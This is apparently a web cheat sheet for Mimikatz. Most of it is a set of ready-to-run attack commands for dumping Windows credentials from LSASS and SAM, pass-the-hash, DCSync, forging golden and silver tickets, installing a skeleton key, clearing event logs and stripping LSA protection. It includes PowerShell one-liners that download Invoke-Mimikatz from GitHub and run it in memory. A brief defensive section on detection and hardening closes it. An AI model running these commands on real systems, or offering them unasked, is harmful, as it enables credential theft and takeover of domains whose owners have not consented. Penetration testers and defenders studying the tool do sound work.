Skip to content

Mimikatz Cheat Sheet

Overview

Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.

⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.

Obtaining Mimikatz

Official Repository

Pre-compiled Binaries

  • mimikatz.exe - 32-bit executable
  • mimikatz_trunk.zip - Contains both 32-bit and 64-bit executables

Compilation from Source

powershell
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build

Basic Usage

Running Mimikatz

powershell
# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Elevating Privileges

privilege::debug

Getting Help

help
<module>::
<module>::<command> /?

Exiting Mimikatz

exit

Core Modules and Commands

sekurlsa Module (LSASS Memory Access)

CommandDescription
sekurlsa::logonpasswordsExtract all logon passwords
sekurlsa::ticketsExtract Kerberos tickets
sekurlsa::ekeysExtract Kerberos encryption keys
sekurlsa::dpapiExtract DPAPI master keys
sekurlsa::credmanExtract credentials from Windows Credential Manager
sekurlsa::msvExtract MSV authentication information
sekurlsa::tspkgExtract TSPKG authentication information
sekurlsa::wdigestExtract WDigest authentication information
sekurlsa::kerberosExtract Kerberos authentication information
sekurlsa::sspExtract SSP authentication information
sekurlsa::livesspExtract LiveSSP authentication information
sekurlsa::cloudapExtract CloudAP authentication information

lsadump Module (SAM and Active Directory)

CommandDescription
lsadump::samExtract hashes from the SAM database
lsadump::secretsExtract LSA secrets
lsadump::cacheExtract cached domain credentials
lsadump::dcsyncPerform DCSync attack to retrieve password data
lsadump::lsaExtract LSA secrets
lsadump::trustExtract domain trust keys
lsadump::backupkeysExtract domain backup keys

kerberos Module (Ticket Manipulation)

CommandDescription
kerberos::listList all Kerberos tickets
kerberos::purgePurge all Kerberos tickets
kerberos::pttPass-the-ticket (inject a ticket)
kerberos::goldenCreate a golden ticket
kerberos::silverCreate a silver ticket
kerberos::tgtCreate a TGT
kerberos::hashCalculate Kerberos keys from password

crypto Module (Cryptographic Operations)

CommandDescription
crypto::certificatesList certificates
crypto::keysList keys
crypto::systemList system certificates
crypto::capiList CAPI certificates
crypto::cngList CNG certificates
crypto::storesList certificate stores

vault Module (Windows Vault Access)

CommandDescription
vault::credList credentials in Windows Vault
vault::listList vault credentials

token Module (Token Manipulation)

CommandDescription
token::whoamiDisplay current token information
token::listList all tokens
token::elevateElevate token privileges
token::revertRevert token
token::runRun a process with a token

privilege Module (Privilege Management)

CommandDescription
privilege::debugEnable debug privilege
privilege::driverLoad a driver

event Module (Event Log Management)

CommandDescription
event::clearClear event logs
event::dropDrop event logs

ts Module (Terminal Services)

CommandDescription
ts::sessionsList terminal services sessions
ts::multirdpEnable multiple RDP sessions

misc Module (Miscellaneous)

CommandDescription
misc::cmdCommand prompt
misc::regeditRegistry editor
misc::taskmgrTask manager
misc::ncroutemonNetwork connection route monitor
misc::detoursDetours detection
misc::skeletonInstall skeleton key

Common Attack Techniques

Credential Dumping

Extract Logon Passwords

privilege::debug
sekurlsa::logonpasswords

Extract Credentials from SAM

privilege::debug
token::elevate
lsadump::sam

Extract Cached Domain Credentials

privilege::debug
lsadump::cache

Extract from LSASS Dump

# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Pass-the-Hash Attacks

Pass-the-Hash with NTLM

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D

Pass-the-Hash with AES Keys

sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF

Over-Pass-the-Hash (Convert NTLM to Kerberos)

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe

DCSync Attack

Extract NTLM Hashes for All Users

lsadump::dcsync /domain:contoso.local /all

Extract NTLM Hash for Specific User

lsadump::dcsync /domain:contoso.local /user:Administrator

Extract NTLM Hash for KRBTGT (for Golden Ticket)

lsadump::dcsync /domain:contoso.local /user:krbtgt

Kerberos Ticket Attacks

List Kerberos Tickets

kerberos::list

Create a Golden Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi

Create a Silver Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi

Pass-the-Ticket

kerberos::ptt golden.kirbi

Purge Tickets

kerberos::purge

Skeleton Key Attack

privilege::debug
misc::skeleton

Advanced Techniques

DPAPI Master Key Extraction

sekurlsa::dpapi

LSA Protection Bypass

# Load mimikatz driver
mimidrv::service

# Enable debug privilege
privilege::debug

# Load driver
!+

# Remove LSASS protection
!processprotect /process:lsass.exe /remove

# Extract credentials
sekurlsa::logonpasswords

Remote Operations

# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Extract Credentials from Windows Credential Manager

vault::cred
vault::list

Extract Domain Backup Keys

lsadump::backupkeys /system:dc01.contoso.local /export

Command Examples with Parameters

sekurlsa::logonpasswords

sekurlsa::logonpasswords [/patch]

sekurlsa::pth

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]

lsadump::dcsync

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv]

kerberos::golden

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]

kerberos::ptt

kerberos::ptt TICKET_FILE

Defensive Measures

Detection Methods

  • Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass.exe
  • Monitor for suspicious LSASS memory access
  • Monitor for DCSync operations (replication requests from non-DC machines)
  • Monitor for ticket creation and manipulation
  • Monitor for privilege escalation

Prevention Methods

  • Enable LSA Protection (RunAsPPL)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
  • Enable Credential Guard (Windows 10/Server 2016+)
  • Implement Protected Users group
  • Disable WDigest authentication
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
  • Implement Just Enough Administration (JEA)
  • Regular password rotation
  • Limit administrative privileges
  • Use strong passwords

Resources